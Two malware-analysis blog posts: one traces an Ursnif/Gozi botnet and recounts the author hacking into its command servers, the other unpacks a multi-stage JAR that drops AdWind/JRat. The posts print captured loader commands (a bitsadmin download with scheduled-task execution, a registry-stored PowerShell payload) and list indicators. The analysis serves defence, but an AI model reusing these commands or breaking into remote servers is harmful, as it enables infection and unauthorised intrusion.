Friday, August 31, 2018

Hacking The Hacker. Stopping a big botnet targeting USA, Canada and Italy

Today I'd like to share a full path analysis including a KickBack attack which took me to gain full access to an entire Ursniff/Gozi BotNet .

  In other words:  from a simple "Malware Sample" to "Pwn the Attacker Infrastructure".

NB: Federal Police has already been alerted on such a topic as well as National and International CERTs/CSIRT (on August 26/27 2018) . Attacked companies and compromised hosts should be already reached out. If you have no idea about this topic until now it means, with high probability, you/your company is not involved on that threat. I am not going to public disclose the victims IPs. 

This disclosure follows the ethical disclosure procedure, which it is close to responsible disclosure procedure but mainly focused on incident rather than on vulnerabilities.

Since blogging is not my business, I do write on my personal blog to share knowledge on Cyber Security, I will describe some of the main steps that took me to own the attacker infrastructure. I will no disclose the found Malware code nor the Malware Command and Control code nor details on attacker's group, since I wont put on future attackers new Malware source code ready to be used.

My entire "Cyber adventure" began from a simple email within a .ZIP file named "Nuovo" as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041) . Inside the ZIP a .VBS file (sha265: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which for the time being August 21 2018 was totally unknown from VirusTotal (unknown = not yet analysed) was ready to get started through double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to avoid simple reverse engineering analyses on it, but I do like  de-obfuscate hidden code (every time it's like a personal challenge). After some hardworking-minutes ( :D ) Stage1 was totally de-obfuscated and ready to be interpreted in plain text. It appeared clear to me that Stage1 was in charged of evading three main AVs such as: Kaspersky Lab, Panda Security and Trend Micro by running simple scans on Microsoft Regedit and dropping and executing additional software.

Stage1. Obfuscation
Indeed if none of searched AV were found on the target system Stage1 was acting as a simple downloader. The specific performed actions follows:
"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
Stage1 was dropping and executing a brand new PE file named: rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the bitsadmin.exe native Microsoft program. BitsAdmin.exe is a command-line tool that system admin can use to create download or upload jobs and monitor their progress over time. This technique have been widely used by Anunak APT during bank frauds on the past few years.

The Stage2 analysis (huge step ahead here)  brought me to an additional brand new Drop and Decrypt stager. Stage3 introduced additional layers of anti-reverse engineering. The following image shows the additional PE section within high entropy on it. It's a significative indication of a Decrypter activity.

Stage2. Drop and Decrypt the Stage3. You might appreciate the high Entropy on added section

Indeed Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. A UPX algorithm was used to hide the real payload in such a way many AV engines were not able to detect it since signature was changing from original payload. Finally the de-packed payload presented many interesting features; for example it was weaponised with evasion techniques such as: timing delay (through sleep), loop delay by calling 9979141 times GetSystemTimeAsFileTime API, BIOS versioning harvesting, system manufacturer information and system fingerprinting to check if it was running on virtual or physical environment. It installed itself on windows auto-run registry to get persistence on the victim machine. The following action was performed while running in background flag:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6').Audibrkr))

The final payload executed the following commands and spawned two main services (WSearch, WerSvc) on the target.
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2
C:\Windows\system32\SearchIndexer.exe /Embedding
taskhost.exe SYSTEM
taskhost.exe $(Arg0)
C:\Windows\System32\svchost.exe -k WerSvcGroup
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2
cmd /C "nslookup > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
C:\Windows\system32\WerFault.exe -u -p 2524 -s 288
"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"

Stage3 finally connects back to C2s once checked its own ip address. Two main C2s were observed:

    • C2 level_1 (for domains and ips check the IoC section). The Stage3 connects back to C2 level_1 to get weaponised. Level_1 Command and Controls get information on victims and deliver plugins to expand the infection functionalities.
    • C2 level_2 (for domains and ips check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to give stolen information. It 's a Ursniff/Gozi and it exfiltrates user credentials by looking for specific files, getting user clipboard and  by performing main in the browser attack against main web sites such as: paypal gmail, microsoft and many online services.

So far so good. Everything looks like one of my usual analyses, but something got my attention. The C2 level_1 had an administration panel which, on my personal point of view, was "hand made" and pretty "young" as implementation by meaning of HTML with not client side controls, no clickjacking controls and not special login tokens. According to Yoroi's mission (to defend its customers) I decided to go further and try to defend people and/or infected companies by getting inside the entire network and  to collaborate to local authorities to shut them down, by getting as much information as possible in order to help federal and local police to fight the Cyber Crime.

Fortunately I spotted a file inclusion vulnerability in Command and Control which took me in ! The following image shows a reverse shell I spawned on Attacker's command and control.

Reverse Shell On C2 Stage_1

Now, I was able to download the entire Command and Control Source Code (php) and study it ! The study of this brand new C2  took me to the next level. First of all I was able to get access to the local database where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image proves that the downloaded Command and Control system has Macedonian dialect (Cyrillic language) on it, according to Anunak APT report made by group-ib.

Command and Control Source Code (snip)
The following image represents a simple screenshot of the database dump within Victim IPs (which are undisclosed for privacy reasons).

C2 level_1 Database 

Additional investigations on database brought new connected IPs. Those IPs were querying the MySQL with administrative rights. At least additional two layers of C2 were present. While the level_1 was weaponising the malware implant the level_2 was collecting information from victims. Thanks to the source code study has been possibile to found more 0Days to be used against C2 and in order to break into the C2 level_2 . Now I was able to see encrypted URLs coming from infected hosts.  Important steps ahead are intentionally missing. Among many URLs the analyst was able to figure out a "test" connection from the Attacker and focus to decrypt such a connection. Fortunately everything needed was written on command and control source code. In the specific case the following function was fundamental to get to clear text !

URL Decryption Function
The eKey was straight on the DB and the decryption function was quite easy to reverse. Finally it was possible to figured out how to decrypt the attacker testing string (the first transaction available on logs) and voilĂ , it was possible to checkin in attacker's email :D !

Attacker eMail: VPS credentials
Once "in" a new need came: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure it was possible to get access to the entire VPS control panel. At this point it was clear the general infrastructure picture* and how to block the threat, not only for customers but for everybody !

Attacker VPS Environment

Sharing these results for free would make vendors (for example: AV companies, Firewall companies, IDS companies and son on) able to update their signatures and to block such a threat for everybody all around the world. I am sure that this work would not block malicious actors, BUT at least we might rise our voice against cyber criminals ! 

In this post I described the main steps that took me to gain access to a big Ursniff/Gozi Botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions have been performed on attacker infrastructure). The threat appeared very well structured, Docker containers were adopted in order to automatise the malicious infrastructure deployment and the code was quite well engineered. Many layers of command and control were found and the entire infrastructure was probably set up from a criminal organisation and not from a single person.

The following graph shows the victim distribution on August 2018. The main targets currently are USA with a 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims on August 2018 are several thousands.

Victims Distribution on August 24 2018

During the analyses was interesting to observe attacker was acquiring domains from an apparent "black market"where many actors where selling and buying "apparent compromised domains" (no evidence on this last sentence, only feeling). The system (following picture) looks like a trading platform within public API that third party systems can operate such as stock operators.

Apparent Domain BlackMarket

Hope you enjoyed the reading.

Following a list of interesting artefacts that would be helpful to block and prevent the described threat.

  • 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d (.vbs)
  • 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041 (Nuovo
  • 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c (rEOuvWkRP.exe)
  • 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e (Stage 3.exe)
Windows Services Names:
  • WSearch
  • WerSvc
Involved eMails:
Involved IPs:
  • 198[.]54[.]116[.]126 (Dropper Stage 2)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]212[.]47[.]9 (C2 level_1)
  • 52[.]151[.]62[.]5 (C2 level_1)
  • 185[.]154[.]53[.]185 (C2 level_1)
  • 185[.]212[.]44[.]209 (C2 level_1)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]158[.]251[.]173 (General Netwok DB)
  • 185[.]183[.]162[.]92 (Orchestrator CPANEL)

Involved Domains:
  • http://englandlistings[.]com/pagverd75.php (Dropper Stage 2)
  • https://pool[.]jfklandscape[.]com  (C2 level_1)
  • https://pool[.]thefutureiskids[.]com (C2 level_1)
  • https://next[.]gardenforyou[.]org (C2 level_1)
  • https://1000numbers[.]com (C2 level_1)
  • https://batterygator[.]com (C2 level_1)
  • https://beard-style[.]com (C2 level_1)
  • https://pomidom[.]com (C2 level_1)
  • (C2 level_1)
  • (C2 level_1)
  • (C2 level_1)
  • (C2 level_1)
  • (Orchestrator CPANEL)

*Actually it was not the whole network, a couple of external systems were investigated as well.

Monday, August 20, 2018

Interesting hidden threat since years ?

Today I'd like to share the following reverse engineering path since it ended up to be more complex respect what I thought. The full path took me about hours work and the sample covers many obfuscation steps and implementation languages. During the analysis time only really few Antivirus (6 out of 60) were able to "detect" the sample. Actually none really detected it, but some AVs triggered "generic unwanted software" signature, without being able to really figure it out. As usually I am not going to show you who was able to detect it compared to the one who wasn't, since I wont ending on wrong a declarations such as (for example): "Marco said that X is better than Y".  Anyway, having the hash file I believe it would be enough to search for such information.

AntiVirus Coverage

The Sample (SHA256: e5c67daef2226a9e042837f6fad5b338d730e7d241ae0786d091895b2a1b8681) presents itself as a JAR file. The first thought that you might have as experienced malware reverse engineer would be: "Ok, another byte code reversing night, easy.. just put focus and debug on it...". BUT surprisingly when you decompile the sample you read the following class !

Stage1: JAR invoking JavaScript
A Java Method that invokes (through evals) an embedded "Javascript" file ! This is totally interesting stuff :D. Let's follow up on stages and see where it goes. The extracted Javascript (stage 2) looks like the following image. The "OOoo00" obfuscation technique have been used. Personally I do not like this obfuscation technique it's harder to reverse respect to different obfuscation techniques, even the CTR-F takes confused on substrings, but we need to figure out what it does, so let's try to manually substitute every string and watch-out for matching substrings (in order words %s/OOoo00/varName/g wont work at all.

Stage 2: evaluated Javacript (obfuscated)
Manually substitution takes "forever" if you do not have a substitution framework which asks you for a string, it replace such string (and not a substring) and eventually represents the new beautified JavaScript. After many substitutions (I really have no idea how many :D) you land on a quite readable JavaScript  as the following one (click on it to make it bigger).

Stage 2: Manually Deobfuscated JavaScript
What is interesting (at least in my personal point of view) is the way the attacker (ab)used the JS-JVM integration. JavaScript takes the Java context by meaning it might use Java functions calling contextual java classes.  In this stage the JavaScript is loading an encrypted content from the original JAR, using a KEY decrypts such a content and finally loads it (Dynamic Class Loader) on memory in order to fire it up as a new Java code. The used encryption algorithm is AES and everything we need to decrypt is in this file, so let's build up a simple python script to print our decryption parameters. The following image shows the decoding script made to easily reconstruct AES-KEY and surrounded parameters. NB: The written python code is not for production, is not protected and full of imprecisions. I made it up just for decode AES key and such, so don't judge it, take it as a known weak but working dirty code.
Python Script to Decode AES-KEY

We now have every decoding parameter, we just need to decrypt the classes by using the following data:
  • ClassName
  • Resource (a.k.a package in where it will be contextualised)
  • Byte to be decrypted
  • Secret Key
  • Byte Length to be decrypted
A Simple Java Decrypter has been developed following the original Malware code. Once run, the following code was decrypted. 

Stage 3 Decrypted JavaClass
Here my favourite point. As you might appreciate from the previous image we are facing a new stage (Stage 3). What is interesting about this new stage is in the way it reflect the old code. It is a defacto replica of the Stage 2. We have new classes to be decrypted (red tag on the image), the same algorithm (orange label on the image), a new KEY (this time is not derived by algorithm as was in Stage 2 but simply in clear text, orange tag on the image) and the same reflective technique in which attacker dynamically loads memory decrypted content on Java.loader and uses it to decrypt again a further step, and after that it replies the code again and again. There is an interesting difference although, this stage builds up a new in memory stage (let's call Stage 4) by adding static GZIpped contents at the end of encrypted section (light blue tag on image). By using that technique the attacker can reach as many decryption stages as he desires. 

At the end of the decryption loop (which took a while, really ) the sample saves (or drops from itself, if you wish) an additional file placed in AppData - Local - Temp named: _ARandomDecimalNumber.class. This .class is actually a JAR file carrying a whole function set. The final stage before ending up runs the following command:

 java -jar _ARandomDecimalNumber.class

The execution of such a command drops on local HardDrive (AppData-Local-Temp) three new files named: RetrieveRandomNumber.vbs (2x) and RandomName.reg. The following image represents a simple 'cat' command on the just dropped files.

On Final Stage VBS Run Files

It's quite funny to see the attacker needed a new language script (he already needed Java, as original entry point, Javascript as payload decrypt and now he is using VBS ! ) to query WMI in order to retrieve installed AntiVirus and Installed Firewall information. Significative the choice to use a .reg file to enumerate tons of security tools that have been widely used by analysts to analyse Malware. The attacker enumerates 571 possible analysis tools that should not be present on the target machine (Victim). Brave, but not neat  at all (on my personal point of view).  The sample does not evade the system but it forces the System Kill of such a process independently if they are installed or not, just like Brute force Killing process. The samples enters in a big loop where it launches 571 sigKill one for each enumerated (.reg) analysis program. It copies through xcopy.exe the entire Java VM into AppData-Roaming-Oracle and by changing local environment classpath uses it to perform the following actions. It finally drops and executes another payload called "plugins".
The following image shows plugins and initial new stage JAR stage.

Final Droppe Files (_RandomDec and plugins)

At a first sight experienced Malware reverser engineer would notice that the original sample finally drops a AdWind/JRat Malware having as a main target to steal files and personal information from victims. While the AdWind/JRat is not interesting per-se since widely analysed,  this new way to deliver AdWind/JRat, it is definitely fascinating me. The attacker mixed up Obfuscation Techniques, Decryption Techniques, File-less abilities, Multi Language Stages and Evasions* Techniques in order to deliver this AdWind/JRat version.  Multiple programming styles have been found during the analysis path. Each Stage belonging with specific programming language is atomic by meaning that could be run separately and each following stage could easily consume its outputs. All these indicators make me believe the original Sample has been built by using Malware builder, which BTW, perfectly fits the AdWind philosophy to run as a service platform. 

A final consideration is about timing. Checking the VirusTotal details (remembering that only 6 on 60 AV were able to say the original JAR was malicious or unwanted) you might notice he following time line.

Detection Time Line (VirusTotal)
VT shows the first time it captured that hash (sha256): it was on 2016. But then the fist submission is on 2018-08-14 few days ago. In such a date (2018-08-14) only 6 out of 60 detected a suspicious (malicious) behaviour and triggered on red state. But what about the almost 2 years between December 2016 and August 2018 ? If we assume the Malware is 2 years old, was it silent until now (until my submission) ? Have we had technology two years ago to detect such a threat ? Or could it be a targeted attack that took almost 2 years before being deployed

I currently have no answers to such a questions, hope you might find some.

*Actually not really an evasion technique, more likely a toolset mitigation.

You will not find Command and Controls (c2) and dropping url because: (i) dropping url/s was/were not found: the sample auto-extracts contents from itself. (ii) No C2 during the delivery stage. Of course AdWind/JRat does C2 but, as explained, the analyst did not followed on the analysis of AdWind/JRat since well-known malware.

  • e5c67daef2226a9e042837f6fad5b338d730e7d241ae0786d091895b2a1b8681 (Original)
  • 97d585b6aff62fb4e43e7e6a5f816dcd7a14be11a88b109a9ba9e8cd4c456eb9 (_RandomDec..)
  • 9da575dd2d5b7c1e9bab8b51a16cde457b3371c6dcdb0537356cf1497fa868f6 (Retreive1)
  • 45bfe34aa3ef932f75101246eb53d032f5e7cf6d1f5b4e495334955a255f32e7 (Retreive2)
  • 296a0ed2a3575e02ba22e74fd5f8740af4f72b629e4e50643ac0c156694a5f3c (.reg)
  • 32d28c43af1afc977b96436b7f638fba15188e6120eeaefa1ad91fb82015fd80 (plugins)

File Paths:

  • ..AppData/Local/Temp/_ARandomDecimalNumber.class
  • ..AppData/Local/Temp/RetreiveRandomNumber.vbs
  • ..AppData/Local/Temp/RetreiveRandomNumber.vbs
  • ..AppData/Local/Temp/RandomNabe.reg